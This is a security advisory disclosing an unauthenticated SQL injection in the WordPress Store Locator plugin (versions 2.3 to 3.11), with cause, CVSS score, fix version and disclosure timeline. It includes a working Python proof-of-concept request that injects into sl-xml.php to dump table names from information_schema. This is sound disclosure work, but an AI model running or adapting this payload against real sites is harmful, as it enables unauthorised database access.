WordPress Store Locator 2.3 - 3.11, SQL Injection
Due to passing the $_GET variable scope into the extract function, an anonymous user can craft a request that will allow them to inject arbitrary SQL into the query which is later built from variables within the script. The output from this query is then returned as XML.
Homepage
https://wordpress.org/plugins/store-locator/
CVSS Score
6.4
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 3.12
Proof of Concept
On a default installation, the following script when executed will return an XML document, containing a list of tables from the information_schema database. Note, that in this example the attacker must know the name of the Store Locator table. It may be possible to perform this attack without knowing the prefix for the WordPress table names.
import requests
url = "http://localhost/wp-content/plugins/store-locator/sl-xml.php"
payload = {
"sl_xml_columns[]":["sqli"],
"sl_custom_fields":", information_schema.tables.table_name as sqli FROM wp_store_locator LEFT JOIN information_schema.tables ON 1=1--",
"debug":"1"
}
r = requests.get(url,params=payload)
print r.text
Timeline
- 2014-10-27: Discovered
- 2014-10-27: Vendor notified
- 2014-10-27: Vendor responded with intent to fix
- 2014-10-29: Version 3.12 released – issue resolved
- 2014-11-03: CVE requested
- 2014-11-05: CVE assigned
- 2014-11-05: Advisory released